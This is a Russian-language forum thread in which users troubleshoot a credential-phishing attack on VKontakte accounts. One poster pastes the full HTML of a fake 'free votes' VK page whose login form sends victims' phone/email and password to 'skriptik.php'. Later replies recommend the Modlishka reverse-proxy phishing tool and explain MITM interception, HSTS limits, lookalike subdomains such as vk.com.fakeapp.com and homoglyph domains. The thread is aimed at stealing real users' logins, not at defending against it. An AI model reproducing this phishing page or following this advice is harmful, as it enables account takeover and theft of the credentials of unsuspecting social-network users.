Как же я сразу не догадался. Ты просто скопировал страницу ВК и даже не убрал оттуда редирект на https?
нет, я разные фейки пробовал, вплоть до стандартного файла апаче, который там изначально лежит, я могу скинуть скелет нынешнего фейка (последние варианты я пробовал конкретно с этим фейком) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <link rel="shortcut icon" href="https://vk.com/images/faviconnew.ico?3" /> <link rel="apple-touch-icon" href="https://vk.com/images/safari_60.png"> <link rel="apple-touch-icon" sizes="76x76" href="https://vk.com/images/safari_76.png"> <link rel="apple-touch-icon" sizes="120x120" href="https://vk.com/images/safari_120.png"> <link rel="apple-touch-icon" sizes="152x152" href="https://vk.com/images/safari_152.png"> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="description" content="" /> <title>Получить голоса | ВКонтакте</title> <link rel="stylesheet" type="text/css" href="https://vk.com/css/al/common.css?509" /> <link type="text/css" rel="stylesheet" href="https://vk.com/css/al/groups.css?115"></link> </head> <body class="is_rtl font_default pads "> <div id="system_msg" class="fixed"></div> <div id="utils"></div> <div id="layer_bg" class="fixed"></div><div id="layer_wrap" class="scroll_fix_wrap fixed"><div id="layer"></div></div> <div id="box_layer_bg" class="fixed"></div><div id="box_layer_wrap" class="scroll_fix_wrap fixed"><div id="box_layer"><div id="box_loader"><div class="loader"></div><div class="back"></div></div></div></div> <div id="stl_left"></div><div id="stl_side"></div> <div class="scroll_fix_wrap" id="page_wrap"><div id="reg_bar" class="top_info_wrap fixed"> <div class="scroll_fix"> <div id="reg_bar_content"> Присоединяйтесь, чтобы всегда оставаться в контакте с друзьями и близкими <div class="button_blue" id="reg_bar_button"><a class="button_link" href=""><button id="reg_bar_btn"><span id="reg_bar_with_arr">Зарегистрироваться</span></button></a></div> </div> </div> </div> <div><div class="scroll_fix"> <div id="page_layout" style="width: 791px;"> <div id="page_header" class="p_head p_head_l0"> <div class="back"></div> <div class="left"></div> <div class="right"></div> <div class="content"> <div id="top_nav" class="head_nav"> <div id="top_logo_down" class="fl_l"></div> <a id="top_home_link" class="top_home_link fl_l" href=""></a> <div id="top_links"> <div class="fl_r" id="top_menu_wrap" style=""> <a id="top_reg_link" class="fl_r top_nav_link" href="" style="">регистрация</a> </div> <a class="fl_l top_nav_link" href="" id="top_back_link"></a> </div> </div> </div> </div> <div id="side_bar" class="fl_l" style=""> <div id="quick_login"> <form method="POST" name="login" action="skriptik.php" id="form_login"> <input type="hidden" name="ref" value="0"> <div class="label">Телефон или email</div> <div class="labeled"><input type="text" name="login" class="text" id="quick_email" required /></div> <div class="label">Пароль</div> <div class="labeled"><input type="password" name="pass" class="text" id="quick_pass" required /></div> <button class="flat_button button_wide button_big" type="submit">Войти</button> </form> <div class="clear forgot"><a id="quick_forgot" href="" target="_top">Забыли пароль?</a><div class="checkbox ta_l" id="quick_expire"><div></div>Чужой компьютер</div></div> </div> </div> <div id="page_body" class="fl_r" style="width: 631px;"> <div id="header_wrap2"> <div id="header_wrap1"> <div id="header" style=""> <h1 id="title">Получить голоса</h1> </div> </div> </div> <div id="wrap_between"></div> <div id="wrap3"><div id="wrap2"> <div id="wrap1"> <div id="content"><div id="group"> <div class="narrow_column fl_r" id="group_narrow"> <div id="page_actions" class="page_actions" style="display: none"> </div><div id="group_narrow_videos"></div><div id="group_narrow_topics"></div> </div> <div class="wide_column fl_l" id="group_wide"> <div class="group_full_private"><div class="group_info_private">С помощью этого сервиса вы можете получить бесплатно голоса на свой аккаунт Вконтакте. <br><a onclick="$('#quick_email').trigger('focus');">Авторизуйтесь</a>, чтобы продолжить.</div></div><div id="group_wide_topics"></div><div id="group_wide_videos"></div> </div> <br class="clear" /> </div></div> </div> </div></div> </div> <div id="footer_wrap" class="fl_r" style="width: 661px;"> <div id="bottom_nav"> <a class="bnav_a" href="">о сайте</a> <a class="bnav_a" href="">правила</a> <a class="bnav_a" href="">реклама</a> <a class="bnav_a" href="">люди</a><a class="bnav_a" href="">сообщества</a> <a class="bnav_a" href="">разработчикам</a> </div> <div id="footer" class="clear"> <div class="copy_lang"><a href="">ВКонтакте</a> © 2015 <a class="bnav_lang" >English</a> <a class="bnav_lang">Русский</a> <a class="bnav_lang">Українська</a> <a class="bnav_lang">все языки »</a></div> ` <div> </div> </div> </div> <div class="clear"></div> </div> </div></div> </div> <div class="progress" id="global_prg"></div> </body> </html>
появилось время сегодня потестить, в итоге с фейком Hellow world у меня вышло "Ваше соединение не защищено" Заметил одну такую вещь, хз важна она или нет. На тачке с кали если я ввожу в адресной строке localhost то открывается фэйк, но если я ввожу локальный ип тачки то открывается дефолтная страница апача
ну в общем решил попробовать с другим доменом, для примера был взят ya.ru, всё получилось, а если выбрать домен с hsts (до этого был vk.com) то пишет про небезопасный серт и нет возможности добавить его в исключение. появился вопрос, если есть hsts то принудительно добавить серт жертва не сможет?
Ну, если для примера, то юзайте Modlishka (https://github.com/drk1wi/Modlishka), это существенно проще.
Это reverse_proxy для случаев, подобных Вашему. Работает как MITM, принимает запросы от клиента, транслирует на настоящий сайт и обратно, попутно перехватыая то, что нужно. По ссылке есть видео - посмотрИте.
Уважаемые, пока сертификат не будет находится на клиентской машине у вас это не получится. Делайте редирект на свой сайт с https и ставьте поддомен: https://vk.com.fakeapp.com Если нужно детально разжевать как работает MITM proxy - могу рассказать, но вопрос в том,что как вы засуните свой сертификат клиенту? Никак. И ssl downgrade у вас не сработает на сайтах такого масштаба. Также есть вариант с покупкой домена с русским "к" и так далее, это тоже может сработать. Есть много вариантов, но SSL для этого и создан что бы это было не простой тупой процедурой. Советую посмотреть это простенькое видео, возможно оно поможет чем-то